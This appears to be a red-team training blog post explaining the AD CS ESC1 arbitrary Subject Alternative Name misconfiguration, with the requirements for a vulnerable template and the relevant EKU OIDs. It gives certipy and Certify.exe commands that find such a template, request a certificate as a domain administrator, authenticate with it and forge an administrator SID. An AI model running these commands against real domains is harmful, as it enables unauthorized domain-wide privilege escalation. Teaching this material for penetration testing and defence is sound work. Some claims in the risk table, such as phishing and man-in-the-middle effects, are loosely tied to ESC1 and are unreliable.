What is the Subject Alternative Name (SAN)?
Arbitrary Subject Alternative Name (SAN) vulnerability is a security concern related to the X.509 certificate standard used in the Transport Layer Security (TLS) protocol.
The Subject Alternative Name field in a certificate allows multiple hostnames to be associated with a single public key.
Table of Contents
- What is the Subject Alternative Name (SAN)?
- AD CS ESC1 – Security Risks
- ESC1 Requirements
- Attacking Arbitrary Subject Alternative Name- ESC1
- CBA Patch
- Conclusion
This is particularly useful in scenarios where a server may have multiple domain names or subdomains.
AD CS ESC1 – Security Risks
Active Directory Certificate Services (AD CS) is crucial for providing public key infrastructure (PKI) functionalities, but it harbors security risks.
Significant among these is the escalation of privileges through misconfigurations, allowing attackers to issue fraudulent certificates or impersonate users.
Additionally, the complexity and maintenance requirements of AD CS make it vulnerable to emerging threats if not properly monitored and updated.
Security Risk
Description
Man-in-the-Middle Attacks
Attackers can exploit the vulnerability to intercept and modify communication between users and the affected server, compromising the confidentiality and integrity of the transmitted data.
Phishing Attacks
Malicious actors may use a certificate with an arbitrary SAN to impersonate a legitimate website, tricking users into providing sensitive information, leading to potential data breaches or fraud.
Domain Hijacking
By manipulating the SAN field, attackers might attempt to take control of a domain or subdomain associated with the certificate, posing a threat to the availability and integrity of online services.
Unauthorized Access
An exploited SAN vulnerability can potentially lead to unauthorized access to sensitive systems or information, compromising the overall security posture of the affected network or infrastructure.
ESC1 Requirements
Req
Description
ENROLLEE_SUPPLIES_SUBJECT
Manual approvals disable
Authorization signatures
Enrollment Rights
List of necessary EKUs
EKU
OID
Description
Client Authentication
1.3.6.1.5.5.7.3.2
PKINIT Client Authentication
1.3.6.1.5.2.3.4
Smart Card Logon
1.3.6.1.4.1.311.20.2.2
Any Purpose
2.5.29.37.0
no EKU
SubCA
Attacking Arbitrary Subject Alternative Name- ESC1
1. Find a Valid Template
certipy find -u [email protected] -p Passw0rd -dc-ip 192.168.160.5
ESC1 - Understand the Arbitrary Subject Alternative Name Vulnerability 5
2. Request Certificate as Administrator
certipy req -username [email protected] -password Passw0rd -ca corp-DC-CA -target ca.ad-attacks.local -template User -upn administrator@ad-attacks.local -dns dc.ad-attacks.local
3. Connect using the new Administrator Certificate
certipy auth -pfx Administrator.pfx -dc-ip 192.168.160.5
CBA Patch
Certify.exe request /ca:cbp-dc.protectedcb.corp\CBP-CA /template:ProtectedUserAccess /altname:administrator /sidextension:S-1-5-21-1286082170-882298176-404569034-500 /domain:protectedcb.corp
Conclusion
The Arbitrary SAN Vulnerability poses a substantial risk to encrypted communications, potentially allowing attackers to bypass encryption safeguards.
By understanding, detecting, and preventing this vulnerability, organizations can better protect their data integrity and confidentiality in the face of evolving cyber threats.
ADCS Certified Enterprise Security Professional
RFS (43)
Offshore NetworkTrain on real enterprise infrastructures with Hack The Box.
Offshore is a real-world enterprise environment that features a wide range of modern Active Directory flaws and misconfigurations.
Tagged in:
Active Directory, cyber red team training, Cyber Security, Keyword red team penetration testing, pen test red team, pen testing red team, pentesting red team, red team exercise examples, red team penetration testing, red team project management software